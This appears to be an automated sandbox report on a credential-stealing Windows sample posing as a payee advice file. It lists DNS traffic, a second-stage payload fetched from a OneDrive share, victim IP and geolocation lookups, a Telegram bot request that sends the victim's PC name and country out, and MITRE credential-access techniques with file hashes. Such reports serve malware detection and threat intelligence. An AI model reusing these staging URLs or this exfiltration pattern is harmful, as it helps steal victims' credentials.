Request: mail.foodex.com.pk IN A
Response:
  mail.foodex.com.pk IN CNAME foodex.com.pk
  foodex.com.pk IN A 37.27.123.72
-
Remote address: 8.8.8.8:53  Request: 92.12.20.2.in-addr.arpa IN PTR  Response: 92.12.20.2.in-addr.arpa IN PTR a2-20-12-92deploystaticakamaitechnologiescom
-
Remote address: 8.8.8.8:53  Request: 72.123.27.37.in-addr.arpa IN PTR  Response: 72.123.27.37.in-addr.arpa IN PTR server43 hndserversnet
-
Remote address: 8.8.8.8:53  Request: 88.210.23.2.in-addr.arpa IN PTR  Response: 88.210.23.2.in-addr.arpa IN PTR a2-23-210-88deploystaticakamaitechnologiescom
-
Remote address: 8.8.8.8:53  Request: 83.210.23.2.in-addr.arpa IN PTR  Response: 83.210.23.2.in-addr.arpa IN PTR a2-23-210-83deploystaticakamaitechnologiescom
-
Remote address: 8.8.8.8:53  Request: 11.227.111.52.in-addr.arpa IN PTR  Response: (empty)
-
13.107.42.12:443  https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content  tls, http  PayeeAdvice_HK54912_R0038704_37504.exe  1.2kB 10.9kB 14 14
HTTP Request: GET https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content
HTTP Response: 302
13.107.42.12:443  https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin  tls, http  PayeeAdvice_HK54912_R0038704_37504.exe  11.1kB 297.8kB 223 223
HTTP Request: GET https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin
HTTP Response: 200
2.3kB 3.8kB 23 14
HTTP Request: GET http://checkip.dyndns.org/
HTTP Response: 200
(10 identical request/response pairs)
172.67.177.134:443  https://reallyfreegeoip.org/xml/181.215.176.83  tls, http  PayeeAdvice_HK54912_R0038704_37504.exe  2.2kB 14.9kB 25 16
HTTP Request: GET https://reallyfreegeoip.org/xml/181.215.176.83
HTTP Response: 200
(9 identical request/response pairs)
149.154.167.220:443  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D  tls, http  PayeeAdvice_HK54912_R0038704_37504.exe  1.2kB 6.7kB 11 11
HTTP Request: GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
HTTP Response: 404
2.0kB 1.3kB 16 17
-
72 B 158 B 1 1
DNS Request
28.118.140.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
140.32.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
97.17.167.52.in-addr.arpa
-
62 B 284 B 1 1
DNS Request
api.onedrive.com
DNS Response
13.107.42.12
-
70 B 279 B 1 1
DNS Request
fa3hwa.dm.files.1drv.com
DNS Response
13.107.42.12
-
71 B 92 B 1 1
DNS Request
12.42.107.13.in-addr.arpa
-
64 B 176 B 1 1
DNS Request
checkip.dyndns.org
DNS Response
132.226.247.73, 193.122.6.168, 193.122.130.0, 158.101.44.242, 132.226.8.169
-
65 B 97 B 1 1
DNS Request
reallyfreegeoip.org
DNS Response
172.67.177.134, 104.21.67.152
-
73 B 158 B 1 1
DNS Request
73.247.226.132.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
134.177.67.172.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
api.telegram.org
DNS Response
149.154.167.220
-
74 B 167 B 1 1
DNS Request
220.167.154.149.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
64 B 94 B 1 1
DNS Request
mail.foodex.com.pk
DNS Response
37.27.123.72
-
69 B 131 B 1 1
DNS Request
92.12.20.2.in-addr.arpa
-
71 B 108 B 1 1
DNS Request
72.123.27.37.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
88.210.23.2.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
83.210.23.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (2)
    Credentials In Files (2)
Downloads
Filesize: 11KB
MD5: fc90dfb694d0e17b013d6f818bce41b0
SHA1: 3243969886d640af3bfa442728b9f0dff9d5f5b0
SHA256: 7fe77ca13121a113c59630a3dba0c8aaa6372e8082393274da8f8608c4ce4528
SHA512: 324f13aa7a33c6408e2a57c3484d1691ecee7c3c1366de2bb8978c8dc66b18425d8cab5a32d1702c13c43703e36148a022263de7166afdce141da2b01169f1c6